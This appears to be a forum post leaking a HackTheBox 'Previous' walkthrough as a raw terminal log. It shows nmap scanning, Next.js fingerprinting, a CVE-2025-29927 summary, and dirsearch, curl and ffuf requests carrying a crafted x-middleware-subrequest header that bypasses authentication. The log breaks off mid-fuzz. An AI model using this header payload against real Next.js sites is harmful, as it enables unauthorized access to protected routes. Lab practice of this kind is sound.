HackTheBox Previous S8 User.txt

By DefaltXploit in HackTheBox

Loading component...

HackTheBox Previous S8 User.txt

By DefaltXploit in HackTheBox

You must be signed in to access this leak.Sign in

Loading component...

DefaltXploit
User
- Posts:4
- Topics:3
- Leaks:3
- Reputation:0
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # nmap -d --unprivileged -Pn -sVC --min-rate 200 $IPHost discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-03 17:57 UTC
PORTS: Using ports open on 0% or more average hosts (TCP:1000, UDP:0, SCTP:0)
--------------- Timing report ---------------
hostgroups: min 1, max 100000
rtt-timeouts: init 1000, min 100, max 10000
max-scan-delay: TCP 1000, UDP 1000, SCTP 1000
parallelism: min 0, max 0
max-retries: 10, host-timeout: 0
min-rate: 200, max-rate: 0
---------------------------------------------
NSE: Using Lua 5.4.
NSE: Arguments from CLI:
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:57
Completed NSE at 17:57, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:57
Completed NSE at 17:57, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:57
Completed NSE at 17:57, 0.00s elapsed
mass_rdns: Using DNS server 8.8.8.8
Initiating Connect Scan at 17:57
Scanning previous.htb (10.10.11.83) [1000 ports]
Discovered open port 22/tcp on 10.10.11.83
Discovered open port 80/tcp on 10.10.11.83
Increased max_successful_tryno for 10.10.11.83 to 1 (packet drop)
Increased max_successful_tryno for 10.10.11.83 to 2 (packet drop)
Increasing send delay for 10.10.11.83 from 0 to 5 due to 40 out of 132 dropped probes since last increase.
Increased max_successful_tryno for 10.10.11.83 to 3 (packet drop)
Increasing send delay for 10.10.11.83 from 5 to 10 due to 17 out of 56 dropped probes since last increase.
Increasing send delay for 10.10.11.83 from 10 to 20 due to 18 out of 58 dropped probes since last increase.
Increasing send delay for 10.10.11.83 from 20 to 40 due to 17 out of 56 dropped probes since last increase.
Increasing send delay for 10.10.11.83 from 40 to 80 due to 17 out of 56 dropped probes since last increase.
Increasing send delay for 10.10.11.83 from 80 to 160 due to 17 out of 55 dropped probes since last increase.
Increasing send delay for 10.10.11.83 from 160 to 320 due to 22 out of 73 dropped probes since last increase.
Increased max_successful_tryno for 10.10.11.83 to 4 (packet drop)
Increasing send delay for 10.10.11.83 from 320 to 640 due to max_successful_tryno increase to 4
Increased max_successful_tryno for 10.10.11.83 to 5 (packet drop)
Increasing send delay for 10.10.11.83 from 640 to 1000 due to max_successful_tryno increase to 5
Completed Connect Scan at 17:57, 8.95s elapsed (1000 total ports)
Overall sending rates: 223.30 packets / s.
Initiating Service scan at 17:57
Scanning 2 services on previous.htb (10.10.11.83)
Completed Service scan at 17:57, 6.46s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.11.83.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:57
NSE: Starting vmware-version against 10.10.11.83:80.
NSE: Starting xmlrpc-methods against 10.10.11.83:80.
NSE: Starting address-info against 10.10.11.83.
NSE: Finished address-info against 10.10.11.83.
NSE: Starting http-ls against 10.10.11.83:80.
NSE: Starting http-webdav-scan against 10.10.11.83:80.
NSE: Starting http-auth against 10.10.11.83:80.
NSE: Starting sshv1 against 10.10.11.83:22.
NSE: Starting http-ntlm-info against 10.10.11.83:80.
NSE: Starting http-svn-enum against 10.10.11.83:80.
NSE: Starting http-trane-info against 10.10.11.83:80.
NSE: Starting hnap-info against 10.10.11.83:80.
NSE: Starting http-svn-info against 10.10.11.83:80.
NSE: Starting ssh-hostkey against 10.10.11.83:22.
NSE: Starting http-robots.txt against 10.10.11.83:80.
NSE: Starting http-title against 10.10.11.83:80.
NSE: Starting https-redirect against 10.10.11.83:80.
NSE: Starting http-cookie-flags against 10.10.11.83:80.
NSE: [http-cookie-flags 10.10.11.83:80] start check of /
NSE: Starting http-cors against 10.10.11.83:80.
NSE: Starting http-favicon against 10.10.11.83:80.
NSE: Starting http-generator against 10.10.11.83:80.
NSE: Starting http-git against 10.10.11.83:80.
NSE: Starting http-methods against 10.10.11.83:80.
NSE: [vmware-version 10.10.11.83:80] Couldn't download file: /sdk
NSE: Finished vmware-version against 10.10.11.83:80.
NSE: Finished xmlrpc-methods against 10.10.11.83:80.
NSE: Finished http-ls against 10.10.11.83:80.
NSE: Finished http-svn-info against 10.10.11.83:80.
NSE: Finished http-git against 10.10.11.83:80.
NSE: Finished http-svn-enum against 10.10.11.83:80.
NSE: [http-trane-info 10.10.11.83:80] HTTP: Host returns proper 404 result.
NSE: [http-methods 10.10.11.83:80] HTTP Status for OPTIONS is 405
NSE: Finished http-robots.txt against 10.10.11.83:80.
NSE: Finished https-redirect against 10.10.11.83:80.
NSE: [hnap-info 10.10.11.83:80] HTTP: Host returns proper 404 result.
NSE: Finished sshv1 against 10.10.11.83:22.
NSE: Finished http-webdav-scan against 10.10.11.83:80.
NSE: Finished http-trane-info against 10.10.11.83:80.
NSE: [http-methods 10.10.11.83:80] Response Code to Random Method is 400
NSE: Finished hnap-info against 10.10.11.83:80.
NSE: Finished http-auth against 10.10.11.83:80.
NSE: Finished http-ntlm-info against 10.10.11.83:80.
NSE: Finished http-title against 10.10.11.83:80.
NSE: [http-cookie-flags 10.10.11.83:80] end check of / : 0 issues found
NSE: Finished http-cookie-flags against 10.10.11.83:80.
NSE: Finished http-generator against 10.10.11.83:80.
NSE: [http-favicon 10.10.11.83:80] No favicon found.
NSE: Finished http-favicon against 10.10.11.83:80.
NSE: Finished http-methods against 10.10.11.83:80.
NSE: Finished http-cors against 10.10.11.83:80.
NSE: Finished ssh-hostkey against 10.10.11.83:22.
Completed NSE at 17:57, 5.91s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:57
NSE: Starting http-server-header against 10.10.11.83:80.
NSE: Finished http-server-header against 10.10.11.83:80.
Completed NSE at 17:57, 0.96s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:57
Completed NSE at 17:57, 0.01s elapsed
Nmap scan report for previous.htb (10.10.11.83)
Host is up, received user-set (0.20s latency).
Scanned at 2025-09-03 17:57:23 UTC for 22s
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_ 256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp open http syn-ack nginx 1.18.0 (Ubuntu)
|_http-title: PreviousJS
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Final times for host: srtt: 202035 rttvar: 3885 to: 217575
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:57
NSE: Starting ssh-hostkey.
NSE: Finished ssh-hostkey.
Completed NSE at 17:57, 0.02s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:57
Completed NSE at 17:57, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:57
Completed NSE at 17:57, 0.01s elapsed
Read from /usr/share/nmap: nmap-protocols nmap-service-probes nmap-services.
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.07 seconds
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # curl -I http://previous.htb
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 03 Sep 2025 18:02:26 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 5493
Connection: keep-alive
X-Powered-By: Next.js
ETag: "17m2fyh3hl048k"
Vary: Accept-Encoding
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # webtech --urls http://previous.htb
Target URL: http://previous.htb
Detected technologies:
- Next.js
- Nginx 1.18.0
- Ubuntu
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # curl -s "http://previous.htb" | grep -o 'href="[^"]*"' | sort -u
href="/_next/static/css/9a1ff1f4870b5a50.css"
href="mailto:jeremy@previous.htb"
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # curl -s "http://previous.htb" | grep -o '"buildId":"[^"]*"'
"buildId":"qVDR2cKpRgqCslEh-llk9"
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # curl -s "http://previous.htb" | grep -oP '(?<=<title data-next-head="">).*?(?=</title>)'
PreviousJS
> Google AI
Recent JavaScript CVEs (2024–2025)
Next.js authorization bypass (CVE-2025-29927)
Vulnerability: A flaw in the Next.js middleware could allow an attacker to bypass critical security checks, including authentication. By manipulating the internal x-middleware-subrequest header, an attacker could skip the middleware layer and access protected routes.
Affected versions: Next.js versions before 12.3.5, 13.5.9, 14.2.25, and 15.2.3.
Resolution: Vercel, the developer of Next.js, released patches to fix the vulnerability and provided details in a postmortem report.
> Reference
https://www.offsec.com/blog/cve-2025-29927/
https://securitylabs.datadoghq.com/articles/nextjs-middleware-auth-bypass/
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # dirsearch -u http://previous.htb -H "x-nextjs-data: 1" -H "x-middleware-subrequest: src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware" -e php,html,js,txt,json,env
_|. _ _ _ _ _ | v0.4.3
(_||| ) (/(_|| (_| )
Extensions: php, html, js, txt, json, env
HTTP method: GET | Threads: 25 | Wordlist size: 11985
Output File: /home/Krypt0n/reports/http_previous.htb/_25-09-03_17-33-09.txt
Target: http://previous.htb/
[17:33:09] Starting:
[17:35:12] 308 - 19B - /axis//happyaxis.jsp -> /axis/happyaxis.jsp
[17:35:12] 308 - 30B - /axis2//axis2-web/HappyAxis.jsp -> /axis2/axis2-web/HappyAxis.jsp
[17:35:12] 308 - 24B - /axis2-web//HappyAxis.jsp -> /axis2-web/HappyAxis.jsp
[17:35:27] 308 - 52B - /Citrix//AccessPlatform/auth/clientscripts/cookies.js -> /Citrix/AccessPlatform/auth/clientscripts/cookies.js
[17:35:53] 200 - 3KB - /docs
[17:35:54] 200 - 1KB - /docs/CHANGELOG.html
[17:35:54] 200 - 1KB - /docs/export-demo.xml
[17:35:54] 200 - 1KB - /docs/swagger.json
[17:35:54] 200 - 1KB - /docs/updating.txt
[17:35:54] 200 - 1KB - /docs/changelog.txt
[17:35:54] 200 - 1KB - /docs/maintenance.txt
[17:36:01] 308 - 42B - /engine/classes/swfupload//swfupload_f9.swf -> /engine/classes/swfupload/swfupload_f9.swf
[17:36:02] 308 - 39B - /engine/classes/swfupload//swfupload.swf -> /engine/classes/swfupload/swfupload.swf
[17:36:07] 308 - 27B - /extjs/resources//charts.swf -> /extjs/resources/charts.swf
[17:36:25] 308 - 37B - /html/js/misc/swfupload//swfupload.swf -> /html/js/misc/swfupload/swfupload.swf
[17:38:46] 200 - 3KB - /signin
Task Completed
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # curl -H "x-nextjs-data: 1" -H "x-middleware-subrequest: src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware" http://previous.htb/docs/ | more
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:- 0 0 0 0 0 0 0 0 --:--:-- 0:0 0 0 0 0 0 0 0 0 --:--:-- 0:0 0 0 0 0 0 0 0 0 --:--:-- 0:0100 5 0 5 0 0 1 0 --:--:-- 0:00:03 --:--:-- 1
/docs
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # curl http://previous.htb/docs/ | more
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:- 0 0 0 0 0 0 0 0 --:--:-- 0:0 0 0 0 0 0 0 0 0 --:--:-- 0:0 0 0 0 0 0 0 0 0 --:--:-- 0:0100 5 0 5 0 0 1 0 --:--:-- 0:00:03 --:--:-- 1
/docs
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # curl http://previous.htb/docs/CHANGELOG.html | more
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:- 0 0 0 0 0 0 0 0 --:--:-- --:-100 53 0 53 0 0 120 0 --:--:-- --:--:-- --:--:-- 121
/api/auth/signin?callbackUrl=%2Fdocs%2FCHANGELOG.html
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # curl http://previous.htb/docs/export-demo.xml | more
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:-100 54 0 54 0 0 124 0 --:--:-- --:--:-- --:--:-- 125
/api/auth/signin?callbackUrl=%2Fdocs%2Fexport-demo.xml
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # curl http://previous.htb/docs/swagger.json | more % Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:-100 51 0 51 0 0 119 0 --:--:-- --:--:-- --:--:-- 120
/api/auth/signin?callbackUrl=%2Fdocs%2Fswagger.json
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # curl http://previous.htb/docs/updating.txt | more % Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:- 0 0 0 0 0 0 0 0 --:--:-- 0:0 0 0 0 0 0 0 0 0 --:--:-- 0:0 0 0 0 0 0 0 0 0 --:--:-- 0:0 0 0 0 0 0 0 0 0 --:--:-- 0:0 0 0 0 0 0 0 0 0 --:--:-- 0:0 0 0 0 0 0 0 0 0 --:--:-- 0:0 0 0 0 0 0 0 0 0 --:--:-- 0:0100 51 0 51 0 0 6 0 --:--:-- 0:0100 51 0 51 0 0 6 0 --:--:-- 0:00:07 --:--:-- 14
/api/auth/signin?callbackUrl=%2Fdocs%2Fupdating.txt
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # curl http://previous.htb/docs/changelog.txt | more
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:-100 52 0 52 0 0 117 0 --:--:-- --:--:-- --:--:-- 117
/api/auth/signin?callbackUrl=%2Fdocs%2Fchangelog.txt
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # curl http://previous.htb/docs/maintenance.txt | more
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:-100 54 0 54 0 0 125 0 --:--:-- --:--:-- --:--:-- 125
/api/auth/signin?callbackUrl=%2Fdocs%2Fmaintenance.txt
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # dirsearch -u http://previous.htb/api -H 'x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware'
_|. _ _ _ _ _ | v0.4.3 (_||| ) (/(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET Threads: 25 | Wordlist size: 11460
Output File: /home/Krypt0n/reports/http_previous.htb/_api_25-09-04_05-27-44.txt
Target: http://previous.htb/
[05:27:45] Starting: api/
[05:27:57] 308 - 22B - /api/%2e%2e//google.com -> /api/%2E%2E/google.com [05:29:37] 400 - 64B - /api/auth/login.jsp
[05:29:37] 400 - 64B - /api/auth/admin
[05:29:37] 400 - 64B - /api/auth/adm
[05:29:37] 400 - 64B - /api/auth/login.html [05:29:38] 400 - 64B - /api/auth/login.aspx [05:29:38] 400 - 64B - /api/auth/logon [05:29:38] 400 - 64B - /api/auth/login.js
[05:29:38] 400 - 64B - /api/auth/login
[05:29:38] 400 - 64B - /api/auth/login.php
[05:29:38] 302 - 0B - /api/auth/signin -> /signin?callbackUrl=http%3A%2F%2Flocalhost%3A3000
[05:29:39] 308 - 28B - /api/axis2-web//HappyAxis.jsp -> /api/axis2-web/HappyAxis.jsp [05:29:39] 308 - 23B - /api/axis//happyaxis.jsp -> /api/axis/happyaxis.jsp
[05:29:40] 308 - 34B - /api/axis2//axis2-web/HappyAxis.jsp -> /api/axis2/axis2-web/HappyAxis.jsp
[05:30:08] 308 - 56B - /api/Citrix//AccessPlatform/auth/clientscripts/cookies.js -> /api/Citrix/AccessPlatform/auth/clientscripts/cookies.js
[05:30:45] 400 - 28B - /api/download
[05:30:54] 308 - 46B - /api/engine/classes/swfupload//swfupload_f9.swf -> /api/engine/classes/swfupload/swfupload_f9.swf
[05:30:54] 308 - 43B - /api/engine/classes/swfupload//swfupload.swf -> /api/engine/classes/swfupload/swfupload.swf
[05:31:00] 308 - 31B - /api/extjs/resources//charts.swf -> /api/extjs/resources/charts.swf
[05:31:24] 308 - 41B - /api/html/js/misc/swfupload//swfupload.swf -> /api/html/js/misc/swfupload/swfupload.swf
Task Completed
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~/Tool # ffuf -u 'http://previous.htb/api/download?FUZZ=a' -w ~/Tool/fuzzDicts/paramDict/AllParam.txt -H 'x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware' -mc all -fw 2 -c
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ /\ \/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://previous.htb/api/download?FUZZ=a
:: Wordlist : FUZZ: /home/Krypt0n/Tool/fuzzDicts/paramDict/AllParam.txt
:: Header : X-Middleware-Subrequest: middleware:middleware:middleware:middleware:middleware
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: all
:: Filter : Response words: 2
________________________________________________
:: Progress: [40/74332] :: Job [1/1] :: 0 req/sec :: Durati:: Progress: [40/74332] :: Job [1/1] :: 0 req/sec :: Durati:: Progress: [40/74332] :: Job [1/1] :: 0 req/sec :: Durati:: Progress: [40/74332] :: Job [1/1] :: 0 req/sec :: Durati:: Progress: [61/74332] :: Job [1/1] :: 0 req/sec :: Durati:: Progress: [80/74332] :: Job [1/1] :: 0 req/sec :: Durati:: Progress: [120/74332] :: Job [1/1] :: 0 req/sec :: Durat:: Progress: [120/74332] :: Job [1/1] :: 0 req/sec :: Durat:: Progress: [143/74332] :: Job [1/1] :: 188 req/sec :: Dur:: Progress: [169/74332] :: Job [1/1] :: 193 req/sec :: Dur:: Progress: [196/74332] :: Job [1/1] :: 198 req/sec :: Dur:: Progress: [212/74332] :: Job [1/1] :: 191 req/sec :: Dur:: Progress: [239/74332] :: Job [1/1] :: 189 req/sec :: Dur:: Progress: [256/74332] :: Job [1/1] :: 174 req/sec :: Dur:: Progress: [290/74332] :: Job [1/1] :: 187 req/sec :: Dur:: Progress: [299/74332] :: Job [1/1] :: 180 req/sec :: Dur:: Progress: [332/74332] :: Job [1/1] :: 195 req/sec :: Dur:: Progress: [347/74332] :: Job [1/1] :: 179 req/sec :: Dur:: Progress: [372/74332] :: Job [1/1] :: 196 req/sec :: Dur:: Progress: [387/74332] :: Job [1/1] :: 173 req/sec :: Dur:: Progress: [412/74332] :: Job [1/1] :: 195 req/sec :: Dur:: Progress: [440/74332] :: Job [1/1] :: 180 req/sec :: Dur:: Progress: [452/74332] :: Job [1/1] :: 195 req/sec :: Dur:: Progress: [480/74332] :: Job [1/1] :: 173 req/sec :: Dur:: Progress: [497/74332] :: Job [1/1] :: 170 req/sec :: Dur:: Progress: [524/74332] :: Job [1/1] :: 173 req/sec :: Dur:: Progress: [545/74332] :: Job [1/1] :: 177 req/sec :: Dur:: Progress: [564/74332] :: Job [1/1] :: 174 req/sec :: Dur:: Progress: [590/74332] :: Job [1/1] :: 177 req/sec :: Dur:: Progress: [612/74332] :: Job [1/1] :: 186 req/sec :: Dur:: Progress: [637/74332] :: Job [1/1] :: 174 req/sec :: Dur:: Progress: [654/74332] :: Job [1/1] :: 183 req/sec :: Dur:: Progress: [665/74332] :: Job [1/1] :: 184 req/sec :: Dur:: Progress: [704/74332] :: Job [1/1] :: 181 req/sec :: Dur:: Progress: [711/74332] :: Job [1/1] :: 168 req/sec :: Dur:: Progress: [741/74332] :: Job [1/1] :: 178 req/sec :: Dur:: Progress: [762/74332] :: Job [1/1] :: 169 req/sec :: Dur:: Progress: [785/74332] :: Job [1/1] :: 175 req/sec :: Dur:: Progress: [819/74332] :: Job [1/1] :: 186 req/sec :: Dur:: Progress: [825/74332] :: Job [1/1] :: 176 req/sec :: Dur:: Progress: [860/74332] :: Job [1/1] :: 179 req/sec :: Dur:: Progress: [865/74332] :: Job [1/1] :: 189 req/sec :: Dur:: Progress: [901/74332] :: Job [1/1] :: 180 req/sec :: Dur:: Progress: [913/74332] :: Job [1/1] :: 181 req/sec :: Dur:: Progress: [943/74332] :: Job [1/1] :: 178 req/sec :: Dur:: Progress: [962/74332] :: Job [1/1] :: 177 req/sec :: Dur:: Progress: [985/74332] :: Job [1/1] :: 193 req/sec :: Dur:: Progress: [1017/74332] :: Job [1/1] :: 176 req/sec :: Du:: Progress: [1026/74332] :: Job [1/1] :: 184 req/sec :: Du:: Progress: [1060/74332] :: Job [1/1] :: 180 req/sec :: Du:: Progress: [1068/74332] :: Job [1/1] :: 181 req/sec :: Du:: Progress: [1105/74332] :: Job [1/1] :: 197 req/sec :: Du:: Progress: [1127/74332] :: Job [1/1] :: 184 req/sec :: Du:: Progress: [1145/74332] :: Job [1/1] :: 196 req/sec :: Du:: Progress: [1172/74332] :: Job [1/1] :: 184 req/sec :: Du:: Progress: [1187/74332] :: Job [1/1] :: 191 req/sec :: Du:: Progress: [1207/74332] :: Job [1/1] :: 179 req/sec :: Du:: Progress: [1229/74332] :: Job [1/1] :: 188 req/sec :: Du:: Progress: [1251/74332] :: Job [1/1] :: 172 req/sec :: Du:: Progress: [1269/74332] :: Job [1/1] :: 188 req/sec :: Du:: Progress: [1303/74332] :: Job [1/1] :: 175 req/sec :: Du:: Progress: [1309/74332] :: Job [1/1] :: 186 req/sec :: Du:: Progress: [1348/74332] :: Job [1/1] :: 190 req/sec :: Du:: Progress: [1350/74332] :: Job [1/1] :: 168 req/sec :: Du:: Progress: [1389/74332] :: Job [1/1] :: 184 req/sec :: Du:: Progress: [1391/74332] :: Job [1/1] :: 166 req/sec :: Du:: Progress: [1429/74332] :: Job [1/1] :: 204 req/sec :: Du:: Progress: [1439/74332] :: Job [1/1] :: 176 req/sec :: Du:: Progress: [1469/74332] :: Job [1/1] :: 201 req/sec :: Du:: Progress: [1490/74332] :: Job [1/1] :: 173 req/sec :: Du:: Progress: [1511/74332] :: Job [1/1] :: 189 req/sec :: Du:: Progress: [1543/74332] :: Job [1/1] :: 175 req/sec :: Du:: Progress: [1551/74332] :: Job [1/1] :: 191 req/sec :: Du:: Progress: [1584/74332] :: Job [1/1] :: 171 req/sec :: Du:: Progress: [1591/74332] :: Job [1/1] :: 190 req/sec :: Du:: Progress: [1629/74332] :: Job [1/1] :: 189 req/sec :: Du:: Progress: [1639/74332] :: Job [1/1] :: 179 req/sec :: Du:: Progress: [1671/74332] :: Job [1/1] :: 193 req/sec :: Du:: Progress: [1681/74332] :: Job [1/1] :: 175 req/sec :: Du:: Progress: [1711/74332] :: Job [1/1] :: 192 req/sec :: Du:: Progress: [1731/74332] :: Job [1/1] :: 175 req/sec :: Du:: Progress: [1754/74332] :: Job [1/1] :: 187 req/sec :: Du:: Progress: [1779/74332] :: Job [1/1] :: 171 req/sec :: Du:: Progress: [1799/74332] :: Job [1/1] :: 183 req/sec :: Du:: Progress: [1823/74332] :: Job [1/1] :: 173 req/sec :: Du:: Progress: [1845/74332] :: Job [1/1] :: 184 req/sec :: Du:: Progress: [1873/74332] :: Job [1/1] :: 187 req/sec :: Du:: Progress: [1886/74332] :: Job [1/1] :: 185 req/sec :: Du:: Progress: [1887/74332] :: Job [1/1] :: 167 req/sec :: Du:: Progress: [1926/74332] :: Job [1/1] :: 183 req/sec :: Du:: Progress: [1927/74332] :: Job [1/1] :: 167 req/sec :: Du:: Progress: [1966/74332] :: Job [1/1] :: 181 req/sec :: Du:: Progress: [1970/74332] :: Job [1/1] :: 156 req/sec :: Du:: Progress: [2007/74332] :: Job [1/1] :: 171 req/sec :: Du:: Progress: [2018/74332] :: Job [1/1] :: 156 req/sec :: Du:: Progress: [2047/74332] :: Job [1/1] :: 172 req/sec :: Du:: Progress: [2068/74332] :: Job [1/1] :: 159 req/sec :: Du:: Progress: [2087/74332] :: Job [1/1] :: 193 req/sec :: Du:: Progress: [2111/74332] :: Job [1/1] :: 167 req/sec :: Du:: Progress: [2136/74332] :: Job [1/1] :: 183 req/sec :: Du:: Progress: [2142/74332] :: Job [1/1] :: 165 req/sec :: Du:: Progress: [2149/74332] :: Job [1/1] :: 164 req/sec :: Du:: Progress: [2149/74332] :: Job [1/1] :: 164 req/sec :: Du:: Progress: [2149/74332] :: Job [1/1] :: 164 req/sec :: Du:: Progress: [2149/74332] :: Job [1/1] :: 164 req/sec :: Du:: Progress: [2149/74332] :: Job [1/1] :: 164 req/sec :: Du:: Progress: [2149/74332] :: Job [1/1] :: 164 req/sec :: Du:: Progress: [2149/74332] :: Job [1/1] :: 164 req/sec :: Du:: Progress: [2149/74332] :: Job [1/1] :: 164 req/sec :: Du:: Progress: [2149/74332] :: Job [1/1] :: 164 req/sec :: Du:: Progress: [2149/74332] :: Job [1/1] :: 164 req/sec :: Du:: Progress: [2149/74332] :: Job [1/1] :: 164 req/sec :: Du:: Progress: [2149/74332] :: Job [1/1] :: 164 req/sec :: Du:: Progress: [2149/74332] :: Job [1/1] :: 164 req/sec :: Du:: Progress: [2149/74332] :: Job [1/1] :: 164 req/sec :: Du:: Progress: [2149/74332] :: Job [1/1] :: 164 req/sec :: Du:: Progress: [2149/74332] :: Job [1/1] :: 164 req/sec :: Du:: Progress: [2149/74332] :: Job [1/1] :: 164 req/sec :: Du:: Progress: [2189/74332] :: Job [1/1] :: 62 req/sec :: Dur:: Progress: [2195/74332] :: Job [1/1] :: 60 req/sec :: Dur:: Progress: [2229/74332] :: Job [1/1] :: 62 req/sec :: Dur:: Progress: [2235/74332] :: Job [1/1] :: 60 req/sec :: Dur:: Progress: [2244/74332] :: Job [1/1] :: 58 req/sec :: Dur:: Progress: [2248/74332] :: Job [1/1] :: 58 req/sec :: Dur:: Progress: [2253/74332] :: Job [1/1] :: 56 req/sec :: Dur:: Progress: [2253/74332] :: Job [1/1] :: 56 req/sec :: Dur:: Progress: [2263/74332] :: Job [1/1] :: 54 req/sec :: Dur:: Progress: [2265/74332] :: Job [1/1] :: 52 req/sec :: Dur:: Progress: [2267/74332] :: Job [1/1] :: 50 req/sec :: Dur:: Progress: [2270/74332] :: Job [1/1] :: 49 req/sec :: Dur:: Progress: [2274/74332] :: Job [1/1] :: 48 req/sec :: Dur:: Progress: [2282/74332] :: Job [1/1] :: 46 req/sec :: Dur:: Progress: [2286/74332] :: Job [1/1] :: 45 req/sec :: Dur:: Progress: [2290/74332] :: Job [1/1] :: 44 req/sec :: Dur:: Progress: [2297/74332] :: Job [1/1] :: 43 req/sec :: Dur:: Progress: [2303/74332] :: Job [1/1] :: 43 req/sec :: Dur:: Progress: [2310/74332] :: Job [1/1] :: 42 req/sec :: Dur:: Progress: [2314/74332] :: Job [1/1] :: 41 req/sec :: Dur:: Progress: [2314/74332] :: Job [1/1] :: 41 req/sec :: Dur:: Progress: [2315/74332] :: Job [1/1] :: 39 req/sec :: Dur:: Progress: [2337/74332] :: Job [1/1] :: 39 req/sec :: Dur:: Progress: [2346/74332] :: Job [1/1] :: 38 req/sec :: Dur:: Progress: [2379/74332] :: Job [1/1] :: 66 req/sec :: Dur:: Progress: [2401/74332] :: Job [1/1] :: 68 req/sec :: Dur:: Progress: [2419/74332] :: Job [1/1] :: 66 req/sec :: Dur:: Progress: [2442/74332] :: Job [1/1] :: 69 req/sec :: Dur:: Progress: [2459/74332] :: Job [1/1] :: 78 req/sec :: Dur:: Progress: [2474/74332] :: Job [1/1] :: 99 req/sec :: Dur:: Progress: [2499/74332] :: Job [1/1] :: 123 req/sec :: Du:: Progress: [2506/74332] :: Job [1/1] :: 124 req/sec :: Du:: Progress: [2544/74332] :: Job [1/1] :: 177 req/sec :: Du:: Progress: [2546/74332] :: Job [1/1] :: 176 req/sec :: Du:: Progress: [2547/74332] :: Job [1/1] :: 148 req/sec :: Du:: Progress: [2586/74332] :: Job [1/1] :: 162 req/sec :: Du:: Progress: [2587/74332] :: Job [1/1] :: 148 req/sec :: Du:: Progress: [2609/74332] :: Job [1/1] :: 135 req/sec :: Du:: Progress: [2628/74332] :: Job [1/1] :: 138 req/sec :: Du:: Progress: [2650/74332] :: Job [1/1] :: 135 req/sec :: Du:: Progress: [2661/74332] :: Job [1/1] :: 136 req/sec :: Du:: Progress: [2691/74332] :: Job [1/1] :: 133 req/sec :: Du:: Progress: [2694/74332] :: Job [1/1] :: 125 req/sec :: Du:: Progress: [2727/74332] :: Job [1/1] :: 141 